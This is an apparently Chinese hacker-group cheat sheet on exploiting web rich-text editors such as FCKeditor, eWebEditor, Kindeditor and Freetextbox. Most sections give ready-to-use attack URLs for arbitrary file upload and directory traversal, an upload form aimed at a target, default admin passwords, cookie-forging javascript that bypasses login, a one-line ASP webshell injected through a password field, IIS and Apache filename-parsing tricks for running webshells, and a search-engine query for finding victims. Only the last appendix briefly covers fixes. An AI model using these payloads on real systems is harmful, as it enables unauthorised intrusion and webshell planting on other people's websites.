編輯器漏洞手冊 · 安全備忘單翻譯項目

# 編輯器漏洞手冊 ## 簡介 **#2014年8月21日** 最初的手冊版本，是由**北洋賤隊**的各位朋友收集整理。時隔4年，我們再次整理了這些文件。目的是希望這種傳統能延續下去。我們相信：星星之火可以燎原。希望大家能多提建議，完善這份手冊。 **#2010年某月某日** 創建這樣一個文檔是為了能夠使得眾多需要得到幫助的人們，在她們最為困苦之時找到為自己點亮的那盞明燈，雖然這將揭示了某個寂靜黑夜下一群躁動不安的人群.他們在享受快感，享受H4ck W0r|d帶給他們的一切. 作為收集整理此文的修訂者，我懷著無比深邃的怨念參考了諸多資料才使得此物最終誕生，在此感謝整理過程中所有施舍幫助于我的人們.愿他們幸福快樂，虎年如意！非常希望各位能夠與我聯系，一并完成本文的創作。 ### 本手冊更新地址 [http://navisec.it/編輯器漏洞手冊/](http://navisec.it/編輯器漏洞手冊/) ### 文章目錄 | 編號 | 名稱 | 最后修訂時間 | | --- | --- | --- | | 1 | [FCKeditor](#fckeditor) | 2010年 | | 2 | [eWebEditor](#ewebeditor) | 2010年 | | 3 | [Cute Editor](#cute-editor) | 2010年 | | 4 | [Webhtmleditor](#webhtmleditor) | 2010年 | | 5 | [Kindeditor](#Kindeditor) | 2010年 | | 6 | [Freetextbox](#freetextbox) | 2010年 | | 7 | [Msn editor](#msn-editor) | 2010年 | ## FCKeditor ### FCKeditor 編輯器頁 ``` FCKeditor/_samples/default.html FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp/sample04.asp fckeditor/editor/filemanager/connectors/test.html ``` ### FCKeditor 查看編輯器版本 ``` FCKeditor/_whatsnew.html ``` FCKeditor V2.43 版本 ``` FCKeditor/editor/filemanager/browser/default/connectors/php/config.php ``` FCKeditor V2.6.6版本 ``` FCKeditor/editor/filemanager/connectors/asp/config.php ``` ### FCKeditor 匿名上傳文件影響版本:非優化/精簡版本的FCKeditor 脆弱描述：如果存在以下文件，打開后即可上傳文件。攻擊利用: ``` FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanager/connectors/uploadtest.html ``` ### FCKeditor 查看文件上傳路徑 ``` FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ ``` XML頁面中第二行 `url=/xxx`的部分就是默認基準上傳路徑 Note: [Hell1]截至2010年02月15日最新版本為FCKeditor v2.6.6 [Hell2]記得修改其中兩處asp為FCKeditor實際使用的腳本語言 ### FCKeditor被動限制策略所導致的過濾不嚴問題影響版本: FCKeditor x.x <= FCKeditor v2.4.3 脆弱描述： FCKeditor v2.4.3中File類別默認拒絕上傳類型：html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc| pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm Fckeditor 2.0 <= 2.2允許上傳asa、cer、php2、php4、inc、pwml、pht后綴的文件上傳后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而沒有使用$sExtension為后綴。直接導致在win下在上傳文件后面加個`.`來突破[未測試]。而在apache下，因為”Apache文件名解析缺陷漏洞”也可以利用之，詳見”附錄A” 另建議其他上傳漏洞中定義TYPE變量時使用File類別來上傳文件,根據FCKeditor的代碼，其限制最為狹隘。攻擊利用: ``` 允許其他任何后綴上傳 ``` ### 利用2003路徑解析漏洞上傳木馬影響版本: 附錄B 脆弱描述：利用2003系統路徑解析漏洞的原理，創建類似`bin.asp`如此一般的目錄，再在此目錄中上傳文件即可被腳本解釋器以相應腳本權限執行。攻擊利用: ``` fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp ``` 強制建立shell.asp目錄： ``` FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684 ``` or ``` FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp ``` Note:[｀Sn4k3!]這個我也不知道咯，有些時候，手動不行，代碼就是能成功，囧。 ### FCKeditor PHP上傳任意文件漏洞影響版本: FCKeditor 2.2 <= FCKeditor 2.4.2 脆弱描述： FCKeditor在處理文件上傳時存在輸入驗證錯誤，遠程攻擊可以利用此漏洞上傳任意文件。在通過editor/filemanager/upload/php/upload.php上傳文件時攻擊者可以通過為Type參數定義無效的值導致上傳任意腳本。成功攻擊要求config.php配置文件中啟用文件上傳，而默認是禁用的。攻擊利用: (請修改action字段為指定網址)： ``` <form id="frmUpload" enctype="multipart/form-data" action="http://navisec.it/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> ``` Note:如想嘗試v2.2版漏洞，則修改Type=任意值即可，但注意，如果換回使用Media則必須大寫首字母M,否則LINUX下，FCKeditor會對文件目錄進行文件名校驗，不會上傳成功的。 ### FCKeditor 暴路徑漏洞影響版本：aspx版FCKeditor 攻擊利用： ``` FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/1.asp ``` ### FCKeditor 文件上傳“.”變“_”下劃線的繞過方法影響版本: FCKeditor => 2.4.x 脆弱描述：我們上傳的文件例如：shell.php.rar或shell.php;.jpg會變為shell_php;.jpg這是新版FCK的變化。攻擊利用: ``` 提交1.php+空格就可以繞過去所有的, ``` ※不過空格只支持win系統 *nix是不支持的[1.php和1.php+空格是2個不同的文件] Note:[http://pstgroup.blogspot.com/2007/05/tipsfckeditor.html](http://pstgroup.blogspot.com/2007/05/tipsfckeditor.html) ### FCKeditor 文件上傳“.”變“_”下劃線的繞過方法（二）影響版本:=>2.4.x的最新版已修補脆弱描述: 來源:T00LS.Net 由于Fckeditor對第一次上傳123.asp;123.jpg 這樣的格式做了過濾。也就是IIS6解析漏洞。上傳第一次。被過濾為123_asp;123.jpg 從而無法運行。但是第2次上傳同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已經存在。文件名被命名為123.asp;123(1).jpg …… 123.asp;123(2).jpg這樣的編號方式。所以。IIS6的漏洞繼續執行了。如果通過上面的步驟進行測試沒有成功，可能有以下幾方面的原因： 1.FCKeditor沒有開啟文件上傳功能，這項功能在安裝FCKeditor時默認是關閉的。如果想上傳文件，FCKeditor會給出錯誤提示。 2.網站采用了精簡版的FCKeditor，精簡版的FCKeditor很多功能丟失，包括文件上傳功能。 3.FCKeditor的這個漏洞已經被修復。 ### FCKeditor 新聞組件遍歷目錄漏洞影響版本:Aspx與JSP版FCKeditor 脆弱描述：如何獲得webshell請參考上文“TYPE自定義變量任意上傳文件漏洞” 攻擊利用: 修改CurrentFolder參數使用 ../../來進入不同的目錄 ``` /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp ``` 根據返回的XML信息可以查看網站所有的目錄。 ``` /browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F /browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F ``` ### TYPE自定義變量任意上傳文件漏洞影響版本: 較早版本脆弱描述：通過自定義Type變量的參數，可以創建或上傳文件到指定的目錄中去，且沒有上傳文件格式的限制。攻擊利用: ``` /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp ``` 打開這個地址就可以上傳任何類型的文件了，Shell上傳到的默認位置是: **[http://navisec.it/UserFiles/all/1.asp](http://navisec.it/UserFiles/all/1.asp)** `Type=all` 這個變量是自定義的,在這里創建了all這個目錄,而且新的目錄沒有上傳文件格式的限制. 比如輸入: ``` /FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp ``` 網馬就可以傳到網站的根目錄下. Note:如找不到默認上傳文件夾可檢查此文件: ``` fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ ``` ## eWebEditor ### eWebEditor 基礎知識默認后臺地址： /ewebeditor/admin_login.asp /WebEdior/admin/login.aspx 建議最好檢測下admin_style.asp文件是否可以直接訪問默認數據庫路徑： ``` [PATH]/db/ewebeditor.mdb [PATH]/db/db.mdb [PATH]/db/%23ewebeditor.mdb ``` 默認密碼： admin/admin888 、 admin/admin、 admin/123456 、admin/admin999 點擊“樣式管理”—可以選擇新增樣式，或者修改一個非系統樣式，將其中圖片控件所允許的上傳類型后面加上|asp、|asa、|aaspsp或|cer，只要是服務器允許執行的腳本類型即可，點擊“提交”并設置工具欄—將“插入圖片”控件添加上。而后—預覽此樣式，點擊插入圖片，上傳WEBSHELL，在“代碼”模式中查看上傳文件的路徑。 2、當數據庫被管理員修改為asp、asa后綴的時候，可以插一句話木馬服務端進入數據庫，然后一句話木馬客戶端連接拿下webshell 3、上傳后無法執行？目錄沒權限？帥鍋你回去樣式管理看你編輯過的那個樣式，里面可以自定義上傳路徑的！！！ 4、設置好了上傳類型，依然上傳不了麼？估計是文件代碼被改了，可以嘗試設定“遠程類型”依照6.0版本拿SHELL的方法來做（詳情見下文↓），能夠設定自動保存遠程文件的類型。 5、不能添加工具欄，但設定好了某樣式中的文件類型，怎么辦？↓這么辦！ (請修改action字段) Action.html 6、需要突破上傳文件類型限制么？Come here! —>> 將圖片上傳類型修改為“aaspsp;”(不含引號)，將一句話shell文件名改為“1.asp;”(不含引號)并上傳即可。—>本條信息來源：微笑刺客 ### eWebEditor 可下載數據庫，但密文解不開脆弱描述：當我們下載數據庫后查詢不到密碼MD5的明文時，可以去看看webeditor_style(14)這個樣式表，看看是否有前輩入侵過或許已經賦予了某控件上傳腳本的能力，構造地址來上傳我們自己的WEBSHELL. 攻擊利用: 比如 ID=46 s-name =standard1 構造代碼: ewebeditor.asp?id=content&style=standard ID和和樣式名改過后 ewebeditor.asp?id=46&style=standard1 ### eWebEditor遍歷目錄漏洞脆弱描述： ewebeditor/admin_uploadfile.asp admin/upload.asp 過濾不嚴，造成遍歷目錄漏洞攻擊利用: 第一種:ewebeditor/admin_uploadfile.asp?id=14 在id=14后面添加&dir=.. 再加 &dir=../.. &dir=[http://navisec.it/../](http://navisec.it/../).. 看到整個網站文件了第二種: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./.. ### eWebEditor 5.2 列目錄漏洞脆弱描述： ewebeditor/asp/browse.asp 過濾不嚴，造成遍歷目錄漏洞攻擊利用： [http://navisec.it/ewebeditor/asp/browse.asp?style=standard650&dir=…././/](http://navisec.it/ewebeditor/asp/browse.asp?style=standard650&dir=…././/).. ### 利用eWebEditor session欺騙漏洞,進入后臺脆弱描述：漏洞文件:Admin_Private.asp 只判斷了session，沒有判斷cookies和路徑的驗證問題。攻擊利用: 新建一個test.asp內容如下: <%Session(“eWebEditor_User”) = “11111111”%> 訪問test.asp，再訪問后臺任何文件，for example:Admin_Default.asp ### eWebEditor asp版 2.1.6 上傳漏洞攻擊利用:（請修改action字段為指定網址） ewebeditor asp版2.1.6上傳漏洞利用程序.html ### eWebEditor 2.7.0 注入漏洞攻擊利用: [http://navisec.it/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200](http://navisec.it/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200) 默認表名：eWebEditor_System默認列名：sys_UserName、sys_UserPass，然后利用nbsi進行猜解. ### eWebEditor2.8.0最終版刪除任意文件漏洞脆弱描述：此漏洞存在于Example\NewsSystem目錄下的delete.asp文件中，這是ewebeditor的測試頁面，無須登陸可以直接進入。攻擊利用: (請修改action字段為指定網址) Del Files.html ### eWebEditor PHP/ASP 后臺通殺漏洞影響版本: PHP ≥ 3.0~3.8與asp 2.8版也通用，或許低版本也可以，有待測試。攻擊利用: 進入后臺/eWebEditor/admin/login.php,隨便輸入一個用戶和密碼,會提示出錯了. 這時候你清空瀏覽器的url,然后輸入 javascript:alert(document.cookie=”adminuser=”+escape(“admin”)); javascript:alert(document.cookie=”adminpass=”+escape(“admin”)); javascript:alert(document.cookie=”admindj=”+escape(“1”)); 而后三次回車,清空瀏覽器的URL,現在輸入一些平常訪問不到的文件如../ewebeditor/admin/default.php，就會直接進去。 ### eWebEditor for php任意文件上傳漏洞影響版本:ewebeditor php v3.8 or older version 脆弱描述: 此版本將所有的風格配置信息保存為一個數組$aStyle,在php.ini配置register_global為on的情況下我們可以任意添加自己喜歡的風格，并定義上傳類型。攻擊利用: phpupload.html ### eWebEditor JSP版漏洞大同小異，我在本文檔不想多說了，因為沒環境測試，網上垃圾場那么大，不好排查。用JSP編輯器的我覺得eweb會比FCKeditor份額少得多。 ### eWebEditor 2.8 商業版插一句話木馬影響版本:=>2.8 商業版攻擊利用: 登陸后臺，點擊修改密碼—-新密碼設置為 `1":eval request("h")’` 設置成功后，訪問asp/config.asp文件即可，一句話木馬被寫入到這個文件里面了. 注意：可能因為轉載的關系，代碼會變掉，最好本地調試好代碼再提交。 ### eWebEditorNet upload.aspx 上傳漏洞(WebEditorNet) 脆弱描述： WebEditorNet 主要是一個upload.aspx文件存在上傳漏洞。攻擊利用: 默認上傳地址：/ewebeditornet/upload.aspx 可以直接上傳一個cer的木馬如果不能上傳則在瀏覽器地址欄中輸入javascript:lbtnUpload.click(); 成功以后查看源代碼找到uploadsave查看上傳保存地址，默認傳到uploadfile這個文件夾里。 ### southidceditor(一般使用v2.8.0版eWeb核心) [http://navisec.it/admin/southidceditor/datas/southidceditor.mdb](http://navisec.it/admin/southidceditor/datas/southidceditor.mdb) [http://navisec.it/admin/southidceditor/admin/admin_login.asp](http://navisec.it/admin/southidceditor/admin/admin_login.asp) [http://navisec.it/admin/southidceditor/popup.asp](http://navisec.it/admin/southidceditor/popup.asp) bigcneditor(eWeb 2.7.5 VIP核心) 其實所謂的Bigcneditor就是eWebEditor 2.7.5的VIP用戶版.之所以無法訪問admin_login.asp，提示“權限不夠”4字真言，估計就是因為其授權“Licensed”問題,或許只允許被授權的機器訪問后臺才對。或許上面針對eWebEditor v2.8以下低版本的小動作可以用到這上面來.貌似沒多少動作?? ## Cute Editor ### Cute Editor在線編輯器本地包含漏洞影響版本: CuteEditor For Net 6.4 脆弱描述：可以隨意查看網站文件內容，危害較大。攻擊利用: [http://navisec.it/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config](http://navisec.it/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config) ### Cute Editor Asp.Net版利用iis解析漏洞獲得權限影響版本： CuteEditor for ASP.NET中文版脆弱描述：脆弱描述： CuteEditor對上傳文件名未重命名，導致其可利用IIS文件名解析Bug獲得webshell權限。攻擊利用：可通過在搜索引擎中鍵入關鍵字 inurl:Post.aspx?SmallClassID= 來找到測試目標。在編輯器中點擊“多媒體插入”，上傳一個名為“xxx.asp;.avi”的網馬，以此獲得權限。 ## Webhtmleditor ### 利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL 影響版本：<= Webhtmleditor最終版1.7 (已停止更新) 脆弱描述/攻擊利用：對上傳的圖片或其他文件無重命名操作，導致允許惡意用戶上傳diy.asp;.jpg來繞過對后綴名審查的限制，對于此類因編輯器作者意識犯下的錯誤，就算遭遇縮略圖，文件頭檢測，也可使用圖片木馬插入一句話來突破。 ## Kindeditor ### 利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL 影響版本: <= kindeditor 3.2.1(09年8月份發布的最新版) 脆弱描述/攻擊利用：拿官方做個演示：進入[http://navisec.it/ke/examples/index.html](http://navisec.it/ke/examples/index.html) 隨意點擊一個demo后點圖片上傳，某君上傳了如下文件：[http://navisec.it/ke/attached/test.asp;.jpg](http://navisec.it/ke/attached/test.asp;.jpg) 大家可以前去圍觀。(現已失效，請速至老琴房彈奏《Secret》回到09年8月份觀看) Note:參見附錄C原理解析。 ## Freetextbox ### Freetextbox遍歷目錄漏洞影響版本：未知脆弱描述：因為ftb.imagegallery.aspx代碼中只過濾了/但是沒有過濾\符號所以導致出現了遍歷目錄的問題。攻擊利用: 在編輯器頁面點圖片會彈出一個框（抓包得到此地址）構造如下，可遍歷目錄。 [http://navisec.it/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\](http://navisec.it/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\).. ### Freetextbox Asp.Net版利用IIS解析漏洞獲得權限影響版本：所有版本脆弱描述：沒做登陸驗證可以直接訪問上傳木馬 Freetextbox 3-3-1 可以直接上傳任意格式的文件 Freetextbox 1.6.3 及其他版本可以上傳格式為x.asp;.jpg 攻擊利用：利用IIS解析漏洞拿SHELL。上傳后SHELL的路徑為[http://navisec.it/images/x.asp;.jpg](http://navisec.it/images/x.asp;.jpg) ## Msn editor ### 利用WIN 2003 IIS文件名稱解析漏洞獲得SHELL 影響版本：未知脆弱描述：點擊圖片上傳后會出現上傳頁面，地址為 [http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=](http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=) 用普通的圖片上傳后，地址為 [http://navisec.it/news/uppic/41513102009204012_1.gif](http://navisec.it/news/uppic/41513102009204012_1.gif) 記住這時候的路徑，再點擊圖片的上傳，這時候地址就變成了 [http://navisec.it/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012](http://navisec.it/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012) 很明顯。圖片的地址是根據RemNum后面的編號生成的。攻擊利用: 配合IIS的解析漏洞，把RemNum后面的數據修改為1.asp;41513102009204012，變成下面這個地址 [http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012](http://navisec.it/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012) 然后在瀏覽器里打開，然后選擇你的腳本木馬上傳，將會返回下面的地址 uppic/1.asp;41513102009204012_2.gif 直接打開就是我們的小馬地址！ ## 附錄 ### 附錄A – Apache文件名解析缺陷漏洞測試環境:apache 2.0.53 winxp,apache 2.0.52 redhat linux 1.國外(SSR TEAM)發了多個advisory稱Apache’s MIME module (mod_mime)相關漏洞,就是attack.php.rar會被當做php文件執行的漏洞，包括Discuz!那個p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。 2.S4T的superhei在blog上發布了這個apache的小特性，即apache 是從后面開始檢查后綴，按最后一個合法后綴執行。其實只要看一下apache的htdocs那些默認安裝的index.XX文件就明白了。 3.superhei已經說的非常清楚了，可以充分利用在上傳漏洞上，我按照普遍允許上傳的文件格式測試了一下，列舉如下(亂分類勿怪) 典型型:rar 備份型:bak,lock 流媒體型：wma,wmv,asx,as,mp4,rmvb 微軟型:sql,chm,hlp,shtml,asp 任意型:test,fake,ph4nt0m 特殊型:torrent 程序型：jsp,c,cpp,pl,cgi 4.整個漏洞的關鍵就是apache的”合法后綴”到底是哪些，不是”合法后綴”的都可以被利用。 5.測試環境 a.php <? phpinfo();?> 然后增加任意后綴測試,a.php.aaa,a.php.aab…. By cloie, in ph4nt0m.net(c) Security. ### 附錄B – iis文件夾名，解析漏洞安裝了iis6的服務器(windows2003)，受影響的文件名后綴有.asp .asa .cdx .cer .pl .php .cgi Windows 2003 Enterprise Edition是微軟目前主流的服務器操作系統。 Windows 2003 IIS6 存在著文件解析路徑的漏洞，當文件夾名為類似hack.asp的時候（即文件夾名看起來像一個ASP文件的文件名），此時此文件夾下的任何類型的文件(比如.gif，.jpg，.txt等)都可以在IIS中被當做ASP程序來執行。這樣黑客即可上傳擴展名為jpg或gif之類的看起來像是圖片文件的木馬文件，通過訪問這個文件即可運行木馬。如果這些網站中有任何一個文件夾的名字是以 .asp .php .cer .asa .cgi .pl 等結尾，那么放在這些文件夾下面的任何類型的文件都有可能被認為是腳本文件而交給腳本解析器而執行。 ### 附錄C – iis文件名，解析漏洞漏洞描述：當文件名為[YYY].asp;[ZZZ].jpg時，Microsoft IIS會自動以asp格式來進行解析。而當文件名為[YYY].php;[ZZZ].jpg時，Microsoft IIS會自動以php格式來進行解析。其中[YYY]與[ZZZ]處為可變化字符串。影響平臺： Windows Server 2000 / 2003 / 2003 R2 (IIS 5.x / 6.0) 修補方法： 1、等待微軟相關的補丁包 2、關閉圖片所在目錄的腳本執行權限（前提是你的某些圖片沒有與程序混合存放） 3、校驗網站程序中所有上傳圖片的代碼段，對形如[YYY].asp;[ZZZ].jpg的圖片做攔截備注：對于Windows Server 2008(IIS7)以及Windows Server 2008 R2(IIS7.5) 則未受影響 Note:(FW) for [http://www.cnblogs.com/webserverguard/archive/2009/09/14/1566597.html](http://www.cnblogs.com/webserverguard/archive/2009/09/14/1566597.html) ## 其他 ### Version 1.3 ### 編輯人員北洋賤隊@Bbs.SecEye.Org： MIAO、豬哥靚、Hell-Phantom、Liange、Fjhh、GxM、Sn4k3! 、微笑刺客…… ### 聯系方式 navisec@163.com security0day@gmail.com (old) 本手冊原地址： [https://docs.google.com/document/d/1w_61xR8U7nmn4Y0CvBHpG1uFIU2ORx69QnqTxQt8Km0/edit?pli=1](https://docs.google.com/document/d/1w_61xR8U7nmn4Y0CvBHpG1uFIU2ORx69QnqTxQt8Km0/edit?pli=1) [編輯器漏洞手冊 pdf版](http://navisec.it/wp-content/uploads/2014/08/編輯器漏洞手冊.pdf)